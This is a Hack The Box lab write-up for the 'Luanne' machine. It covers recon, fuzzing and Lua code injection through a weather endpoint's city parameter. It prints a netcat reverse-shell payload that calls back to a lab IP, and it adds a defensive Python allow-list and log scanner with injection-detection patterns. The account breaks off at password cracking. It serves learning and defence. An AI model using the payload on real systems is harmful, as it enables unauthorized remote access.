Luanne ~ Hack The Box
Prerequisite
Just to make life easier, I usually add an entry to my hosts file so the target machine is easier to reach.
echo "10.10.10.215 luanne.htb" >> /etc/hosts

Okay now onto the hacking!
Reconnaissance
As always, I started off with an Nmap scan against the machine.
nmap -Pn -sC -sV -oN initial luanne.htb

Scanning & Enumeration
Based on the scan results, I realized that port 80 was running a web server. This was the web app being served!

I was unauthorized to access the site. However, I found a directory that was listed in robots.txt.

Thus, I ran a directory brute force attack against it using gobuster.

I found that /weather/forecast was a valid directory.

Accessing it gave me this message. From the message I inferred that the endpoint expected a parameter, so I supplied one in the URL.

My next order of business was to run a parameter fuzz attack on ?city=. I used an Intruder attack from Burp Suite for that. I also used a custom fuzz list which I found on GitHub.

The fuzz attack revealed that the weather script was a .lua file. Thus, I started thinking about whether I could get remote code execution by tampering with the parameters.
Exploitation
The first step was to confirm whether the theory would work. For that, I used a simple payload to run the command whoami.

Now that I had confirmed RCE, it was time to craft a payload to get a reverse shell. After constructing the payload, I had to URL-encode it.
neewashere') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.47 666 >/tmp/f')--

I discovered that the machine was running NetBSD while doing enumeration. Thus, I picked an OpenBSD-based netcat reverse shell which I found here.


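The payload above works because the value of ?city= ends up spliced into Lua source, so a quote, a closing parenthesis and a trailing Lua comment let the rest of the line become attacker code. The following is an added example, not code from the writeup or from the box itself, showing the defender's side of that bug: a strict allow-list check the handler should have applied to the city value, and a small access-log scanner that flags requests whose query parameters carry the injection indicators seen in this writeup (quote-then-parenthesis break-out, os.execute, trailing "--"). The log lines are constructed for the example, and the assumption that the handler built Lua source by string concatenation is inferred from the payload, not confirmed by the page.

```python
"""
Defensive companion to the Lua-injection pattern in the writeup.

Assumed (not confirmed by the page): the forecast handler concatenated the
city parameter into Lua source, so  x') os.execute('...')--  closed the
string literal, ran a command, and commented out the remainder of the line.

is_valid_city()      - allow-list validation the handler should apply before
                       the value touches any code path.
find_lua_indicators()- returns the injection indicators present in one
                       decoded query value.
scan_access_log()    - runs the indicator check over Combined-Log-Format
                       lines (constructed samples below) and reports hits.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for a city name: letters, digits, spaces, hyphens and periods,
# up to 64 characters.  Apostrophes are deliberately excluded because the
# break-out seen here starts with one; a handler that must accept them should
# never build code from the value in the first place.
CITY_RE = re.compile(r"[A-Za-z][A-Za-z0-9 .-]{0,63}")

# Indicators taken from the payload shape in the writeup.
LUA_INDICATORS = [
    (re.compile(r"""['"]\s*\)"""), "closes quoted argument"),
    (re.compile(r"\bos\.execute\b"), "os.execute call"),
    (re.compile(r"--\s*$"), "trailing Lua comment"),
]

# Apache/nginx combined log format: ip ident user [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: one benign, one with an encoded space, one
# carrying the break-out payload from the writeup (whoami), one with no query.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Nov/2020:10:01:02 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 312',
    '10.0.0.5 - - [26/Nov/2020:10:01:05 +0000] "GET /weather/forecast?city=New+York HTTP/1.1" 200 298',
    '10.0.0.9 - - [26/Nov/2020:10:01:09 +0000] "GET /weather/forecast?city=x%27%29%20os.execute%28%27whoami%27%29-- HTTP/1.1" 200 88',
    '10.0.0.9 - - [26/Nov/2020:10:01:12 +0000] "GET /robots.txt HTTP/1.1" 200 41',
]


def is_valid_city(value: str) -> bool:
    """True only if the whole value matches the allow-list."""
    return CITY_RE.fullmatch(value) is not None


def find_lua_indicators(decoded_value: str) -> list:
    """Names of the indicators present in an already percent-decoded value."""
    return [name for rx, name in LUA_INDICATORS if rx.search(decoded_value)]


def scan_access_log(lines) -> list:
    """Return one finding per (request, parameter) whose value shows indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m["path"]).query
        # parse_qs percent-decodes and turns '+' into a space for us.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                hits = find_lua_indicators(value)
                if hits:
                    findings.append({
                        "ip": m["ip"],
                        "timestamp": m["ts"],
                        "param": param,
                        "value": value,
                        "indicators": hits,
                        "allowlist_ok": is_valid_city(value),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} {f['param']}={f['value']!r} -> {', '.join(f['indicators'])}")
```

The allow-list check is the fix that matters: it runs before the value reaches the Lua interpreter, so the break-out never reaches code. The log scanner is the after-the-fact check, useful for confirming from web server logs whether the same parameter was probed, and it reports whether each flagged value would have passed the allow-list so the two checks can be compared on real traffic.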
Lateral Movement
Now that I had a shell on the machine, I busted out linpeas.sh and tried to enumerate the machine further.


Linpeas revealed a password hash located in the root web directory.


Next up, I fired up john to try and crack the password.
Still trying to crack :(
Privilege Escalation
Haven't even gotten the user flag :(